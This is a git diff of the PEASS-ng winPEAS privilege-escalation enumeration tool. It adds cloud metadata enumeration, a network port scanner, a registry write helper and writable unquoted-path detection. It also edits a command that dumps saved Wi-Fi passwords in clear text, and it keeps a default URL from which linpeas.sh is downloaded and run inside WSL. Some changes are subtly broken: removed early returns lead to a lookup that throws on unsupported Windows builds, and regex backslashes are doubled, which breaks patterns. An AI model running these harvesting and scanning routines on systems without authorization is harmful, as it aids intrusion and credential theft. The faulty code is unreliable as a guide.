diff --git a/LICENSE b/LICENSE
index 78a5d1c..afa1236 100755
--- a/LICENSE
+++ b/LICENSE
@@ -1,7 +1,7 @@
COPYING -- Describes the terms under which peass-ng is distributed. A copy
of the GNU General Public License (GPL) is appended to this file.
-peass-ng is (C) 2006-2022 Carlos Polop Martin.
+peass-ng is (C) 2019-2024 Carlos Polop Martin.
This program is free software; you may redistribute and/or modify it under
the terms of the GNU General Public License as published by the Free
diff --git a/README.md b/README.md
index c72e70b..47ac44c 100755
--- a/README.md
+++ b/README.md
@@ -38,6 +38,3 @@ If you want to **add something** and have **any cool idea** related to this proj
All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own machines and/or with the owner's permission.
-
-
-By Polop(TM)
diff --git a/linPEAS/README.md b/linPEAS/README.md
index 298bfc3..7f202a0 100755
--- a/linPEAS/README.md
+++ b/linPEAS/README.md
@@ -233,5 +233,3 @@ If you find any issue, please report it using **[github issues](https://github.c
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
-
-By Polop(TM)
diff --git a/winPEAS/README.md b/winPEAS/README.md
index b0724fc..0407e78 100755
--- a/winPEAS/README.md
+++ b/winPEAS/README.md
@@ -23,5 +23,3 @@ Are you a PEASS fan? Get now our merch at **[PEASS Shop](https://teespring.com/s
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
-
-By Polop
diff --git a/winPEAS/winPEASbat/README.md b/winPEAS/winPEASbat/README.md
index 112fc0d..444a33c 100755
--- a/winPEAS/winPEASbat/README.md
+++ b/winPEAS/winPEASbat/README.md
@@ -132,6 +132,3 @@ This is the kind of outpuf that you have to look for when usnig the winPEAS.bat
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
-
-
-By Polop(TM)
diff --git a/winPEAS/winPEASbat/winPEAS.bat b/winPEAS/winPEASbat/winPEAS.bat
index 0d43701..5478eea 100755
--- a/winPEAS/winPEASbat/winPEAS.bat
+++ b/winPEAS/winPEASbat/winPEAS.bat
@@ -4,7 +4,7 @@ COLOR 0F
CALL :SetOnce
REM :: WinPEAS - Windows local Privilege Escalation Awesome Script
-REM :: Code by PEASS-ng; Re-Write by ThisLimn0
+REM :: Code by carlospolop; Re-Write by ThisLimn0
REM Registry scan of other drives besides
REM /////true or false
@@ -46,7 +46,7 @@ CALL :ColorLine " %E%32m(((((((((. ,%E%92m(############################(%E%32m
CALL :ColorLine " %E%32m(((((((((/, %E%92m,####################(%E%32m/..((((((((((.%E%97m"
CALL :ColorLine " %E%32m(((((((((/,. %E%92m,*//////*,.%E%32m ./(((((((((((.%E%97m"
CALL :ColorLine " %E%32m(((((((((((((((((((((((((((/%E%97m"
-ECHO. by github.com/PEASS-ng
+ECHO. by carlospolop
ECHO.
ECHO.
@@ -363,7 +363,7 @@ CALL :T_Progress 1
:WifiCreds
CALL :ColorLine " %E%33m[+]%E%97m WIFI"
-for /f "tokens=3,* delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%b key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.)
+for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.)
CALL :T_Progress 1
:BasicUserInfo
diff --git a/winPEAS/winPEASexe/README.md b/winPEAS/winPEASexe/README.md
index e80f09e..5f54578 100755
--- a/winPEAS/winPEASexe/README.md
+++ b/winPEAS/winPEASexe/README.md
@@ -178,6 +178,11 @@ Once you have installed and activated it you need to:
- [x] DNS Cache (limit 70)
- [x] Internet Settings
+- **Cloud Metadata Enumeration**
+ - [x] AWS Metadata
+ - [x] GCP Metadata
+ - [x] Azure Metadata
+
- **Windows Credentials**
- [x] Windows Vault
- [x] Credential Manager
@@ -256,6 +261,3 @@ If you find any issue, please report it using **[github issues](https://github.c
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
-
-
-By Polop
diff --git a/winPEAS/winPEASexe/Tests/SmokeTests.cs b/winPEAS/winPEASexe/Tests/SmokeTests.cs
index 49525a3..9542bf8 100644
--- a/winPEAS/winPEASexe/Tests/SmokeTests.cs
+++ b/winPEAS/winPEASexe/Tests/SmokeTests.cs
@@ -12,7 +12,7 @@ namespace winPEAS.Tests
try
{
string[] args = new string[] {
- "systeminfo", "userinfo", "servicesinfo", "browserinfo", "eventsinfo", "debug"
+ "systeminfo", "userinfo", "servicesinfo", "browserinfo", "eventsinfo", "cloud", "debug"
};
Program.Main(args);
}
diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs
index fbf64cc..307cf94 100644
--- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs
+++ b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs
@@ -20,7 +20,7 @@ namespace winPEAS._3rdParty.Watson
{
{ 10240, "1507" }, { 10586, "1511" }, { 14393, "1607" }, { 15063, "1703" }, { 16299, "1709" },
{ 17134, "1803" }, { 17763, "1809" }, { 18362, "1903" }, { 18363, "1909" }, { 19041, "2004" },
- { 19042, "20H2" }
+ { 19042, "20H2" }, { 22000, "21H2" }, { 22621, "22H2" }
};
// Get OS Build number
@@ -30,7 +30,6 @@ namespace winPEAS._3rdParty.Watson
if (!supportedVersions.ContainsKey(buildNumber))
{
Console.Error.WriteLine($" [!] Windows version not supported, build number: '{buildNumber}'");
- return;
}
var version = supportedVersions[buildNumber];
@@ -39,7 +38,6 @@ namespace winPEAS._3rdParty.Watson
else
{
Console.Error.WriteLine(" [!] Could not retrieve Windows BuildNumber");
- return;
}
// List of KBs installed
diff --git a/winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs
index 7e75254..fed1fe3 100644
--- a/winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs
@@ -117,6 +117,7 @@ namespace winPEAS.Checks
{ (app["Folder"].Length > 0) ? app["Folder"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "ouigyevb2uivydi2u3id2ddf3", !string.IsNullOrEmpty(app["interestingFolderRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
{ (app["File"].Length > 0) ? app["File"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "adu8v298hfubibuidiy2422r", !string.IsNullOrEmpty(app["interestingFileRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
{ (app["Reg"].Length > 0) ? app["Reg"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "o8a7eduia37ibduaunbf7a4g7ukdhk4ua", (app["RegPermissions"].Length > 0) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
+ { "Potentially sensitive file content:", Beaprint.ansi_color_bad },
};
string line = "";
@@ -158,9 +159,9 @@ namespace winPEAS.Checks
line += "\n File: " + filepath_mod;
}
- if (app["isUnquotedSpaced"].ToLower() == "true")
+ if (app["isUnquotedSpaced"].ToLower() != "false")
{
- line += " (Unquoted and Space detected)";
+ line += $" (Unquoted and Space detected) - {app["isUnquotedSpaced"]}";
}
if (!string.IsNullOrEmpty(app["interestingFileRights"]))
@@ -168,6 +169,11 @@ namespace winPEAS.Checks
line += "\n FilePerms: " + app["interestingFileRights"];
}
+ if (app.ContainsKey("sensitiveInfoList") && !string.IsNullOrEmpty(app["sensitiveInfoList"]))
+ {
+ line += "\n Potentially sensitive file content: " + app["sensitiveInfoList"];
+ }
+
Beaprint.AnsiPrint(line, colorsA);
Beaprint.PrintLineSeparator();
}
diff --git a/winPEAS/winPEASexe/winPEAS/Checks/Checks.cs b/winPEAS/winPEASexe/winPEAS/Checks/Checks.cs
index 17e7e7e..45e67d4 100644
--- a/winPEAS/winPEASexe/winPEAS/Checks/Checks.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/Checks.cs
@@ -3,12 +3,14 @@ using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Management;
+using System.Net;
using System.Security.Principal;
using winPEAS.Helpers;
using winPEAS.Helpers.AppLocker;
using winPEAS.Helpers.Registry;
using winPEAS.Helpers.Search;
using winPEAS.Helpers.YamlConfig;
+using winPEAS.Info.NetworkInfo.NetworkScanner;
using winPEAS.Info.UserInfo;
namespace winPEAS.Checks
@@ -21,8 +23,12 @@ namespace winPEAS.Checks
public static bool IsDebug = false;
public static bool IsLinpeas = false;
public static bool IsLolbas = false;
+ public static bool IsNetworkScan = false;
public static bool SearchProgramFiles = false;
+ private static IEnumerable PortScannerPorts = null;
+ private static string NetworkScanOptions = string.Empty;
+
// Create Dynamic blacklists
public static readonly string CurrentUserName = Environment.UserName;
public static string CurrentUserDomainName = Environment.UserDomainName;
@@ -47,7 +53,7 @@ namespace winPEAS.Checks
private static readonly HashSet _systemCheckSelectedKeysHashSet = new HashSet();
// github url for Linpeas.sh
- public static string LinpeasUrl = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh";
+ public static string LinpeasUrl = "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh";
public const string DefaultLogFile = "out.txt";
@@ -87,7 +93,8 @@ namespace winPEAS.Checks
new SystemCheck("windowscreds", new WindowsCreds()),
new SystemCheck("browserinfo", new BrowserInfo()),
new SystemCheck("filesinfo", new FilesInfo()),
- new SystemCheck("fileanalysis", new FileAnalysis())
+ new SystemCheck("fileanalysis", new FileAnalysis()),
+ new SystemCheck("cloudinfo", new CloudInfo())
};
var systemCheckAllKeys = new HashSet(_systemChecks.Select(i => i.Key));
@@ -199,6 +206,52 @@ namespace winPEAS.Checks
}
}
+ if (arg.StartsWith("-network", StringComparison.CurrentCultureIgnoreCase))
+ {
+ /*
+ -network="auto" - find interfaces/hosts automatically
+ -network="10.10.10.10,10.10.10.20" - scan only selected ip address(es)
+ -network="10.10.10.10/24" - scan host based on ip address/netmask
+ */
+ if (!IsNetworkTypeValid(arg))
+ {
+ Beaprint.ColorPrint($" [!] the \"-network\" argument is invalid. For help, run winpeass.exe --help", Beaprint.YELLOW);
+
+ return;
+ }
+
+ var parts = arg.Split('=');
+ string networkType = parts[1];
+
+ IsNetworkScan = true;
+ NetworkScanOptions = networkType;
+ }
+
+ if (arg.StartsWith("-ports", StringComparison.CurrentCultureIgnoreCase))
+ {
+ // e.g. -ports="80,443,8080"
+ var parts = arg.Split('=');
+ if (!IsNetworkScan || parts.Length != 2 || string.IsNullOrEmpty(parts[1]))
+ {
+ Beaprint.ColorPrint($" [!] the \"-network\" argument is not present or valid, add it if you want to define network scan ports. For help, run winpeass.exe --help", Beaprint.YELLOW);
+
+ return;
+ }
+
+ var portString = parts[1];
+ IEnumerable ports = new List();
+ try
+ {
+ PortScannerPorts = portString.Trim('"').Trim('\'').Split(',').ToList().ConvertAll(int.Parse);
+ }
+ catch (Exception)
+ {
+ Beaprint.ColorPrint($" [!] the \"-ports\" argument is not present or valid, add it if you want to define network scan ports. For help, run winpeass.exe --help", Beaprint.YELLOW);
+
+ return;
+ }
+ }
+
string argToLower = arg.ToLower();
if (systemCheckAllKeys.Contains(argToLower))
{
@@ -237,7 +290,7 @@ namespace winPEAS.Checks
CheckRunner.Run(() => CreateDynamicLists(isFileSearchEnabled), IsDebug);
- RunChecks(isAllChecks, wait);
+ RunChecks(isAllChecks, wait, IsNetworkScan);
SearchHelper.CleanLists();
@@ -258,7 +311,58 @@ namespace winPEAS.Checks
}
}
- private static void RunChecks(bool isAllChecks, bool wait)
+ private static bool IsNetworkTypeValid(string arg)
+ {
+ var parts = arg.Split('=');
+ string networkType = string.Empty;
+
+ if (parts.Length == 2 && !string.IsNullOrEmpty(parts[1]))
+ {
+ networkType = parts[1];
+
+ // auto
+ if (string.Equals(networkType, "auto", StringComparison.InvariantCultureIgnoreCase))
+ {
+ return true;
+ }
+
+ // netmask e.g. 10.10.10.10/24
+ else if (networkType.Contains("/"))
+ {
+ var rangeParts = networkType.Split('/');
+
+ if (rangeParts.Length == 2 && int.TryParse(rangeParts[1], out int res) && res <= 32 && res >= 0)
+ {
+ return true;
+ }
+ }
+ // list of ip addresses
+ else if (networkType.Contains(","))
+ {
+ var ips = networkType.Split(',');
+
+ try
+ {
+ var validIpsCount = ips.ToList().ConvertAll(IPAddress.Parse).Count();
+ }
+ catch (Exception)
+ {
+ return false;
+ }
+
+ return true;
+ }
+ // single ip
+ else if (IPAddress.TryParse(networkType, out _))
+ {
+ return true;
+ }
+ }
+
+ return false;
+ }
+
+ private static void RunChecks(bool isAllChecks, bool wait, bool isNetworkScan)
{
for (int i = 0; i < _systemChecks.Count; i++)
{
@@ -274,6 +378,12 @@ namespace winPEAS.Checks
}
}
}
+
+ if (isNetworkScan)
+ {
+ NetworkScanner scanner = new NetworkScanner(NetworkScanOptions, PortScannerPorts);
+ scanner.Scan();
+ }
}
private static void CreateDynamicLists(bool isFileSearchEnabled)
diff --git a/winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs
new file mode 100644
index 0000000..bf1dc37
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs
@@ -0,0 +1,93 @@
+using System.Collections.Generic;
+using winPEAS.Helpers;
+using winPEAS.Info.CloudInfo;
+
+namespace winPEAS.Checks
+{
+ internal class CloudInfo : ISystemCheck
+ {
+ public void PrintInfo(bool isDebug)
+ {
+ Beaprint.GreatPrint("Cloud Information");
+
+ var cloudInfoList = new List
+ {
+ new AWSInfo(),
+ new AzureInfo(),
+ new GCPInfo()
+ };
+
+ foreach (var cloudInfo in cloudInfoList)
+ {
+ string isCloud = cloudInfo.IsCloud ? "Yes" : "No";
+ string line = string.Format($"{cloudInfo.Name + "?",-40}{isCloud,-5}");
+
+ Dictionary colorsMS = new Dictionary()
+ {
+ { "Yes", Beaprint.ansi_color_bad },
+ };
+ Beaprint.AnsiPrint(line, colorsMS);
+ }
+
+ foreach (var cloudInfo in cloudInfoList)
+ {
+ if (cloudInfo.IsCloud)
+ {
+ Beaprint.MainPrint(cloudInfo.Name + " Enumeration");
+
+ if (cloudInfo.IsAvailable)
+ {
+ foreach (var kvp in cloudInfo.EndpointDataList())
+ {
+ // key = "section", e.g. User, Network, ...
+ string section = kvp.Key;
+ var endpointDataList = kvp.Value;
+
+ Beaprint.ColorPrint(section, Beaprint.ansi_color_good);
+
+ foreach (var endpointData in endpointDataList)
+ {
+ var colors = new Dictionary
+ {
+ { endpointData.EndpointName, Beaprint.GRAY }
+ };
+
+ string message;
+ if (!string.IsNullOrEmpty(endpointData.Data))
+ {
+ message = endpointData.Data;
+ // if it is a JSON data, add additional newline so it's displayed on a separate line
+ if (message.StartsWith("{"))
+ {
+ message = $"\n{message}\n";
+ }
+
+ if (endpointData.IsAttackVector)
+ {
+ colors.Add(message, Beaprint.ansi_color_bad);
+ }
+ else
+ {
+ colors.Add(message, Beaprint.ansi_color_gray);
+ }
+ }
+ else
+ {
+ message = "No data received from the metadata endpoint";
+ }
+
+ Beaprint.ColorPrint($"{endpointData.EndpointName,-30}{message}", Beaprint.ansi_color_gray);
+ }
+
+ Beaprint.GrayPrint("");
+ }
+ }
+ else
+ {
+ Beaprint.NoColorPrint("Could not connect to the metadata endpoint");
+ }
+ }
+ }
+ }
+ }
+}
diff --git a/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs b/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs
index 3da86fd..b440757 100644
--- a/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs
@@ -1,4 +1,4 @@
-using System;
+using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
@@ -97,9 +97,19 @@ namespace winPEAS.Checks
else
{
foreach (var fold in file.FullPath.Split('\\').Skip(1))
- {
- isFileFound = Regex.IsMatch(fold, pattern, RegexOptions.IgnoreCase);
- if (isFileFound) break;
+ {
+ try
+ {
+ isFileFound = Regex.IsMatch(fold, pattern, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(20));
+ if (isFileFound) break;
+ }
+ catch (RegexMatchTimeoutException e)
+ {
+ if (Checks.IsDebug)
+ {
+ Beaprint.GrayPrint($"The file in folder regex {pattern} had a timeout in {fold} (ReDoS avoided but regex unchecked in a file)");
+ }
+ }
}
}
}
@@ -111,7 +121,17 @@ namespace winPEAS.Checks
}
else
{
- isFileFound = Regex.IsMatch(file.Filename, pattern, RegexOptions.IgnoreCase);
+ try
+ {
+ isFileFound = Regex.IsMatch(file.Filename, pattern, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(20));
+ }
+ catch (RegexMatchTimeoutException e)
+ {
+ if (Checks.IsDebug)
+ {
+ Beaprint.GrayPrint($"The file regex {pattern} had a timeout in {file.Filename} (ReDoS avoided but regex unchecked in a file)");
+ }
+ }
}
}
@@ -148,7 +168,7 @@ namespace winPEAS.Checks
return new bool[] { false, somethingFound };
}
- private static List SearchContent(string text, string regex_str, bool caseinsensitive)
+ public static List SearchContent(string text, string regex_str, bool caseinsensitive)
{
List foundMatches = new List();
@@ -157,17 +177,20 @@ namespace winPEAS.Checks
Regex rgx;
bool is_re_match = false;
try
- {
+ {
+ // Escape backslashes in the regex string
+ string escapedRegex = regex_str.Trim().Replace(@"\", @"\\");
+
// Use "IsMatch" because it supports timeout, if exception is thrown exit the func to avoid ReDoS in "rgx.Matches"
if (caseinsensitive)
{
- is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120));
- rgx = new Regex(regex_str.Trim(), RegexOptions.IgnoreCase);
+ is_re_match = Regex.IsMatch(text, escapedRegex, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120));
+ rgx = new Regex(escapedRegex, RegexOptions.IgnoreCase);
}
else
{
- is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.None, TimeSpan.FromSeconds(120));
- rgx = new Regex(regex_str.Trim());
+ is_re_match = Regex.IsMatch(text, escapedRegex, RegexOptions.None, TimeSpan.FromSeconds(120));
+ rgx = new Regex(escapedRegex);
}
}
catch (RegexMatchTimeoutException e)
@@ -200,8 +223,6 @@ namespace winPEAS.Checks
Beaprint.GrayPrint($"Error looking for regex {regex_str} inside files: {e}");
}
- //}
-
return foundMatches;
}
@@ -444,7 +465,7 @@ namespace winPEAS.Checks
foundRegexes[regex_obj.name][regex.name] = fileResults;
}
}
- catch (Exception ex)
+ catch (System.IO.IOException)
{
// Cannot read the file
}
@@ -454,8 +475,8 @@ namespace winPEAS.Checks
timer.Stop();
TimeSpan timeTaken = timer.Elapsed;
- if (timeTaken.TotalMilliseconds > 20000)
- Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}s in {f.FullPath}");
+ if (timeTaken.TotalMilliseconds > 10000)
+ Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}ms in {f.FullPath}");
}
}
}
diff --git a/winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs
index 2513936..b6974f9 100644
--- a/winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs
@@ -290,15 +290,13 @@ namespace winPEAS.Checks
const string distribution = "Distribution";
const string rootDirectory = "Root directory";
const string runWith = "Run command";
+ const string wslUser = "WSL user";
+ const string root = "root";
+
var colors = new Dictionary();
- new List
- {
- linpeas,
- distribution,
- rootDirectory,
- runWith
- }.ForEach(str => colors.Add(str, Beaprint.ansi_color_bad));
+ new List { linpeas, distribution, rootDirectory, runWith, wslUser, root }
+ .ForEach(str => colors.Add(str, Beaprint.ansi_color_bad));
Beaprint.BadPrint(" Found installed WSL distribution(s) - listed below");
Beaprint.AnsiPrint($" Run {linpeas} in your WSL distribution(s) home folder(s).\n", colors);
@@ -310,14 +308,16 @@ namespace winPEAS.Checks
string distributionSubKey = $"{basePath}\\{wslKey}";
string distributionRootDirectory = $"{RegistryHelper.GetRegValue(hive, distributionSubKey, "BasePath")}\\rootfs";
string distributionName = RegistryHelper.GetRegValue(hive, distributionSubKey, "DistributionName");
+ string user = WSLHelper.TryGetRootUser(distributionName, wslKey);
Beaprint.AnsiPrint($" {distribution}: \"{distributionName}\"\n" +
+ $" {wslUser}: \"{user}\"\n" +
$" {rootDirectory}: \"{distributionRootDirectory}\"\n" +
$" {runWith}: wsl.exe --distribution \"{distributionName}\"",
colors);
Beaprint.PrintLineSeparator();
}
- catch (Exception) { }
+ catch (Exception ex) { }
}
// try to run linpeas.sh in the default distribution
@@ -328,7 +328,7 @@ namespace winPEAS.Checks
{
try
{
- WSL.RunLinpeas(Checks.LinpeasUrl);
+ WSLHelper.RunLinpeas(Checks.LinpeasUrl);
}
catch (Exception ex)
{
diff --git a/winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs
index d1a6b14..a6d4ced 100644
--- a/winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs
@@ -36,11 +36,14 @@ namespace winPEAS.Checks
{ "Possible DLL Hijacking.*", Beaprint.ansi_color_bad },
};
- if (DefensiveProcesses.Definitions.ContainsKey(procInfo["Name"]))
+ // we need to find first occurrence of the procinfo name
+ string processNameSanitized = procInfo["Name"].Trim().ToLower();
+
+ if (DefensiveProcesses.AVVendorsByProcess.ContainsKey(processNameSanitized))
{
- if (!string.IsNullOrEmpty(DefensiveProcesses.Definitions[procInfo["Name"]]))
+ if (DefensiveProcesses.AVVendorsByProcess[processNameSanitized].Count > 0)
{
- procInfo["Product"] = DefensiveProcesses.Definitions[procInfo["Name"]];
+ procInfo["Product"] = string.Join(", ", DefensiveProcesses.AVVendorsByProcess[processNameSanitized]);
}
colorsP[procInfo["Product"]] = Beaprint.ansi_color_good;
}
diff --git a/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs
index ab046f5..d8950b0 100644
--- a/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs
@@ -387,8 +387,7 @@ namespace winPEAS.Checks
static void PrintCachedCreds()
{
- try
- {
+ try{
Beaprint.MainPrint("Cached Creds");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#cached-credentials", "If > 0, credentials will be cached in the registry and accessible by SYSTEM user");
string cachedlogonscount = RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "CACHEDLOGONSCOUNT");
diff --git a/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs b/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs
index ce11f8d..8cbc17e 100644
--- a/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs
+++ b/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs
@@ -81,6 +81,7 @@ namespace winPEAS.Helpers
/---------------------------------------------------------------------------------\
| {1}Do you like PEASS?{0} |
|---------------------------------------------------------------------------------|
+ | {3}Get the latest version{0} : {2}https://github.com/sponsors/carlospolop{0} |
| {3}Follow on Twitter{0} : {2}@hacktricks_live{0} |
| {3}Respect on HTB{0} : {2}SirBroccoli {0} |
|---------------------------------------------------------------------------------|
@@ -132,6 +133,7 @@ namespace winPEAS.Helpers
Console.WriteLine(LCYAN + " filesinfo" + GRAY + " Search generic files that can contains credentials" + NOCOLOR);
Console.WriteLine(LCYAN + " fileanalysis" + GRAY + " Search specific files that can contains credentials and for regexes inside files" + NOCOLOR);
Console.WriteLine(LCYAN + " eventsinfo" + GRAY + " Display interesting events information" + NOCOLOR);
+ Console.WriteLine(LCYAN + " cloudinfo" + GRAY + " Enumerate cloud information" + NOCOLOR);
Console.WriteLine();
Console.WriteLine(LCYAN + " quiet" + GRAY + " Do not print banner" + NOCOLOR);
Console.WriteLine(LCYAN + " notcolor" + GRAY + " Don't use ansi colors (all white)" + NOCOLOR);
@@ -146,6 +148,11 @@ namespace winPEAS.Helpers
Console.WriteLine(LCYAN + " -lolbas" + GRAY + $" Run additional LOLBAS check" + NOCOLOR);
Console.WriteLine(LCYAN + " -linpeas=[url]" + GRAY + $" Run additional linpeas.sh check for default WSL distribution, optionally provide custom linpeas.sh URL\n" +
$" (default: {Checks.Checks.LinpeasUrl})" + NOCOLOR);
+ Console.WriteLine(LCYAN + " -network" + GRAY + $" Run additional network scanning - find network interfaces, hosts and scan nmap top 1000 TCP ports for each host found\n" +
+ $" -network=\"auto\" - find interfaces/hosts automatically" + NOCOLOR + "\n" +
+ $" -network=\"10.10.10.10,10.10.10.20\" - scan only selected ip address(es)" + NOCOLOR + "\n" +
+ $" -network=\"10.10.10.10/24\" - scan host based on ip address/netmask" + NOCOLOR + "\n" +
+ $" -ports=\"80,443,8080\" - If a list of ports is provided, use this list instead of the nmap top 1000 TCP" + NOCOLOR);
}
@@ -290,8 +297,7 @@ namespace winPEAS.Helpers
string value = entry.Value;
string key = entry.Key;
- string line = "";
-
+ string line;
if (!no_gray)
{
line = ansi_color_gray + " " + key + ": " + NOCOLOR + value;
diff --git a/winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs b/winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs
index a905c08..c183446 100644
--- a/winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs
+++ b/winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs
@@ -122,6 +122,51 @@ namespace winPEAS.Helpers
return binaryPath;
}
+ public static bool CheckQuoteAndSpaceWithPermissions(string path, out List injectablePaths)
+ {
+ List result = new List();
+ bool isInjectable = false;
+
+ if (!path.Contains('"') && !path.Contains("'"))
+ {
+ if (path.Contains(" "))
+ {
+ string currentPath = string.Empty;
+ foreach (var pathPart in Regex.Split(path, @"\s"))
+ {
+ currentPath += pathPart + " ";
+
+ if (File.Exists(currentPath) || Directory.Exists(currentPath))
+ {
+ var permissions = PermissionsHelper.GetPermissionsFolder(currentPath, Checks.Checks.CurrentUserSiDs, PermissionType.WRITEABLE_OR_EQUIVALENT);
+
+ if (permissions.Any())
+ {
+ result.Add(currentPath);
+ isInjectable = true;
+ }
+ }
+ else
+ {
+ var firstPathPart = currentPath;
+ DirectoryInfo di = new DirectoryInfo(firstPathPart);
+ var exploitablePath = di.Parent.FullName;
+ var folderPermissions = PermissionsHelper.GetPermissionsFolder(exploitablePath, Checks.Checks.CurrentUserSiDs, PermissionType.WRITEABLE_OR_EQUIVALENT);
+
+ if (folderPermissions.Any())
+ {
+ result.Add(exploitablePath);
+ isInjectable = true;
+ };
+ }
+ }
+ }
+ }
+
+ injectablePaths = result.Select(i => i).Distinct().ToList();
+ return isInjectable;
+ }
+
public static bool CheckQuoteAndSpace(string path)
{
if (!path.Contains('"') && !path.Contains("'"))
diff --git a/winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs b/winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs
index 51f0d15..7e76194 100644
--- a/winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs
+++ b/winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs
@@ -24,6 +24,40 @@ namespace winPEAS.Helpers.Registry
return Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path);
}
+ public static bool WriteRegValue(string hive, string path, string keyName, string value)
+ {
+ try
+ {
+ RegistryKey regKey;
+ if (hive == "HKCU")
+ {
+ regKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey(path);
+ }
+ else if (hive == "HKU")
+ {
+ regKey = Microsoft.Win32.Registry.Users.OpenSubKey(path);
+
+ }
+ else
+ {
+ regKey = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path);
+ }
+
+ if (regKey == null)
+ {
+ return false;
+ }
+
+ regKey.SetValue(keyName, value, RegistryValueKind.String);
+ }
+ catch (Exception ex)
+ {
+ return false;
+ }
+
+ return true;
+ }
+
public static string GetRegValue(string hive, string path, string value)
{
// returns a single registry value under the specified path in the specified hive (HKLM/HKCU)
diff --git a/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs b/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs
index d064d7d..cd106a2 100644
